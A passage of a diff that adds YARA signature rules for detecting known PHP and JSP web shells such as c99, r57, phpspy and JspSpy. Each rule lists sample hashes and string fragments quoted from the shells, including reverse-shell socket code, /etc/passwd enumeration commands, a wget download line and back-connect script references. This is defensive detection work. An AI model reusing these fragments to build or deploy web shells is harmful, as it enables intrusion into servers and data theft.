+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+	strings:
+		$s0 = "elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype"
+		$s8 = "echo \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"P"
+	condition:
+		all of them
+}
+rule webshell_in_JFolder_jfolder01_jsp_leo_warn {
+	meta:
+		description = "Web Shell - from files in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash1 = "8979594423b68489024447474d113894"
+		hash2 = "ec482fc969d182e5440521c913bab9bd"
+		hash3 = "f98d2b33cd777e160d1489afed96de39"
+		hash4 = "4b4c12b3002fad88ca6346a873855209"
+		hash5 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s4 = "sbFile.append(\"  &nbsp;<a href=\\\"javascript:doForm('down','\"+formatPath(strD"
+		$s9 = "sbFile.append(\" &nbsp;<a href=\\\"javascript:doForm('edit','\"+formatPath(strDi"
+	condition:
+		all of them
+}
+rule webshell_2_520_icesword_job_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s2 = "private String[] _textFileTypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\","
+		$s3 = "\\\" name=\\\"upFile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typ"
+		$s9 = "if (request.getParameter(\"password\") == null && session.getAttribute(\"passwor"
+	condition:
+		all of them
+}
+rule webshell_phpspy_2005_full_phpspy_2005_lite_PHPSPY {
+	meta:
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "0712e3dc262b4e1f98ed25760b206836"
+	strings:
+		$s6 = "<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['comma"
+		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"
+		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "
+	condition:
+		2 of them
+}
+rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "40a1f840111996ff7200d18968e42cfe"
+		hash2 = "e0202adff532b28ef1ba206cf95962f2"
+		hash3 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s5 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
+	condition:
+		all of them
+}
+rule webshell_c99_Shell_ci_Biz_was_here_c100_v_xxx {
+	meta:
+		description = "Web Shell - from files c99.php, Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "f2fa878de03732fbf5c86d656467ff50"
+		hash2 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash3 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash4 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash5 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s8 = "else {echo \"Running datapipe... ok! Connect to <b>\".getenv(\"SERVER_ADDR\""
+	condition:
+		all of them
+}
+rule webshell_2008_2009lite_2009mssql {
+	meta:
+		description = "Web Shell - from files 2008.php, 2009lite.php, 2009mssql.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "3f4d454d27ecc0013e783ed921eeecde"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+	strings:
+		$s0 = "<a href=\"javascript:godir(\\''.$drive->Path.'/\\');"
+		$s7 = "p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all"
+	condition:
+		all of them
+}
+rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash2 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "0712e3dc262b4e1f98ed25760b206836"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword
+		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"
+	condition:
+		all of them
+}
+rule webshell_807_dm_JspSpyJDK5_m_cofigrue {
+	meta:
+		description = "Web Shell - from files 807.jsp, dm.jsp, JspSpyJDK5.jsp, m.jsp, cofigrue.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash2 = "341298482cf90febebb8616426080d1d"
+		hash3 = "88fc87e7c58249a398efd5ceae636073"
+		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+	strings:
+		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
+		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
+	condition:
+		1 of them
+}
+rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {
+	meta:
+		description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
+		hash1 = "f8a6d5306fb37414c5c772315a27832f"
+		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
+	strings:
+		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
+		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
+	condition:
+		all of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_xxx {
+	meta:
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "4b4c12b3002fad88ca6346a873855209"
+		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash8 = "e9a5280f77537e23da2545306f6a19ad"
+	strings:
+		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
+	condition:
+		all of them
+}
+rule webshell_jsp_reverse_jsp_reverse_jspbd {
+	meta:
+		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		super_rule = 1
+		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
+		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
+		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
+		score = 50
+	strings:
+		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
+		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
+		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
+	condition:
+		all of them
+}
+rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {
+	meta:
+		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "36331f2c81bad763528d0ae00edf55be"
+		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash2 = "8979594423b68489024447474d113894"
+		hash3 = "ec482fc969d182e5440521c913bab9bd"
+		hash4 = "f98d2b33cd777e160d1489afed96de39"
+		hash5 = "4b4c12b3002fad88ca6346a873855209"
+		hash6 = "e9a5280f77537e23da2545306f6a19ad"
+		hash7 = "598eef7544935cf2139d1eada4375bb5"
+	strings:
+		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
+		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
+	condition:
+		2 of them
+}
+rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
+	strings:
+		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
+	condition:
+		2 of them
+}
+rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 60
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash4 = "40a1f840111996ff7200d18968e42cfe"
+		hash5 = "e0202adff532b28ef1ba206cf95962f2"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
+		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
+		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
+		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
+		$fn = "filename: backup"
+	condition:
+		2 of ($s*) and not $fn
+}
+rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {
+	meta:
+		description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
+		hash1 = "ef43fef943e9df90ddb6257950b3538f"
+		hash2 = "ae025c886fbe7f9ed159f49593674832"
+		hash3 = "911195a9b7c010f61b66439d9048f400"
+		hash4 = "697dae78c040150daff7db751fc0c03c"
+		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash9 = "41af6fd253648885c7ad2ed524e0692d"
+		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
+	strings:
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
+	condition:
+		all of them
+}
+rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {
+	meta:
+		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "e2830d3286001d1455479849aacbbb38"
+		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
+	strings:
+		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
+		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
+	condition:
+		2 of them
+}
+rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {
+	meta:
+		description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "f2fa878de03732fbf5c86d656467ff50"
+		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+	strings:
+		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
+		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
+		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
+		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
+	condition:
+		2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {
+	meta:
+		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "f3ca29b7999643507081caab926e2e74"
+		hash2 = "527cf81f9272919bf872007e21c4bdda"
+	strings:
+		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
+		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {
+	meta:
+		description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "9c34adbc8fd8d908cbb341734830f971"
+		hash3 = "f2fa878de03732fbf5c86d656467ff50"
+		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
+		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
+		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
+		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
+	condition:
+		2 of them
+}
+rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
+	meta:
+		description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
+	strings:
+		$s0 = "$this -> addFile($content, $filename);" fullword
+		$s3 = "function addFile($data, $name, $time = 0) {" fullword
+		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
+		$s9 = "foreach($filelist as $filename){" fullword
+	condition:
+		all of them
+}
+rule webshell_c99_c66_c99_shadows_mod_c99shell {
+	meta:
+		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
+		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
+		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
+		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
+		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
+	condition:
+		2 of them
+}
+rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {
+	meta:
+		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash1 = "d71716df5042880ef84427acee8b121e"
+		hash2 = "344f9073576a066142b2023629539ebd"
+		hash3 = "32dea47d9c13f9000c4c807561341bee"
+		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash5 = "3ea688e3439a1f56b16694667938316d"
+		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
+	strings:
+		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
+		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
+	condition:
+		2 of them
+}
+rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash4 = "e0354099bee243702eb11df8d0e046df"
+		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash6 = "655722eaa6c646437c8ae93daac46ae0"
+		hash7 = "591ca89a25f06cf01e4345f98a22845c"
+	strings:
+		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
+		$s5 = "File tempF = new File(savePath);" fullword
+		$s9 = "if (tempF.isDirectory()) {" fullword
+	condition:
+		2 of them
+}
+rule webshell_c99_c99shell_c99_c99shell {
+	meta:
+		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+	strings:
+		$s2 = "$bindport_pass = \"c99\";" fullword
+		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
+	condition:
+		1 of them
+}
+rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {
+	meta:
+		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash4 = "3f71175985848ee46cc13282fbed2269"
+	strings:
+		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
+		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+	condition:
+		2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {
+	meta:
+		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "4745d510fed4378e4b1730f56f25e569"
+		hash2 = "f3ca29b7999643507081caab926e2e74"
+		hash3 = "46a18979750fa458a04343cf58faa9bd"
+	strings:
+		$s3 = "BODY, TD, TR {" fullword
+		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+	condition:
+		2 of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {
+	meta:
+		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "6acc82544be056580c3a1caaa4999956"
+		hash23 = "6aa32a6392840e161a018f3907a86968"
+		hash24 = "591ca89a25f06cf01e4345f98a22845c"
+		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash26 = "3ea688e3439a1f56b16694667938316d"
+		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash28 = "71097537a91fac6b01f46f66ee2d7749"
+		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
+	strings:
+		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
+		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
+		$s9 = "sis = request.getInputStream();" fullword
+	condition:
+		4 of them
+}
+rule webshell_2_520_icesword_job_ma1 {
+	meta:
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+	strings:
+		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+	condition:
+		2 of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {
+	meta:
